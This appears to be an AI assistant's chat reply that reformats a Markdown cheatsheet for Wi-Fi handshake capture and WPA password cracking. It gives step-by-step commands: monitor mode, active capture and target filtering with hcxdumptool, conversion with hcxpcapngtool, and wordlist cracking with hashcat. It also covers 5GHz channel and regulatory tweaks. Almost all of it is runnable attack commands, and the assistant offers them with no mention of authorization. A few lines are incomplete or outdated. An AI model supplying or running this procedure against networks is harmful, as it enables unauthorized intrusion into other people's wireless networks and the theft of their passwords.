You're right, my mistake. Here is the Markdown with the titles unboxed and the commands in code blocks: # Wi-Fi Handshake Capture & Crack Cheatsheet 📡 ## Table of Contents 📋 - [Preliminary Commands & Information Retrieval](#preliminary) - [Capture & Conversion Phase](#capture) - [Additional Scans & Information](#additional) - [Cracking Phase](#cracking) - [5GHz Network Capturing Cheat Sheet](#5ghz) ## Preliminary Commands & Information Retrieval **Secure Copy from Remote Device** ``` scp -r root@ /home/username/Desktop ``` 📖 Downloads files from remote devices using SCP. **Check Wireless Interfaces** ``` iwconfig ``` 📖 Displays wireless network interface details. **Kill Interfering Services** ``` airmon-ng check kill ``` 📖 Stops services that might interfere with wireless tools. ## Capture & Conversion Phase **Set Wireless Card to Monitor Mode** ``` sudo ip link set wlan0 down sudo iw wlan0 set monitor control sudo ip link set wlan0 up ``` 📖 Prepares the wireless card for capture. **Capture Handshakes with hcxdumptool** ``` hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15 ``` 📖 Captures packets from networks. **Convert Captured File for Hashcat** ``` hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng ``` 📖 Converts packets for password cracking. ## Additional Scans & Information **Scan for Nearby Networks** ``` hcxdumptool --do_rcascan -i wlan1 ``` 📖 Scans and displays nearby networks. ## Cracking Phase **Crack with Hashcat** ``` hashcat -m 22000 hash.hc22000 wordlist.txt ``` 📖 Uses hashcat to attempt password cracks. ## 5GHz Network Capturing Cheat Sheet 1. **Install Necessary Tools** ``` sudo apt-get install hcxdumptool hcxtools ``` 2. **Check for 5GHz Support** ``` iw list ``` 3. **Enable Monitor Mode** ``` sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up ``` 4. **Set to 5GHz Channel** ``` sudo iw dev wlan0 set channel 36 ``` 5. **Identify Target Networks** ``` sudo hcxdumptool -i wlan0 --scan ``` 6. **Capture Traffic** ``` sudo hcxdumptool -i wlan0 --enable_status=1 -o output.pcapng --filterlist=filterlist.txt --filtermode=2 ``` 7. **Analyze Captured Traffic** ``` hcxpcaptool -z output.hccapx output.pcapng ``` 8. **Troubleshooting** ``` sudo iw reg get sudo iw reg set US ``` 9. **Switch Back to 2.4GHz** ``` sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo iw dev wlan0 set channel 6 sudo ip link set wlan0 up ``` 10. **List 2.4GHz Channels** ``` iw phy phy0 channels iwlist wlan0 channel ``` Let me know if this looks better or if you need any other changes!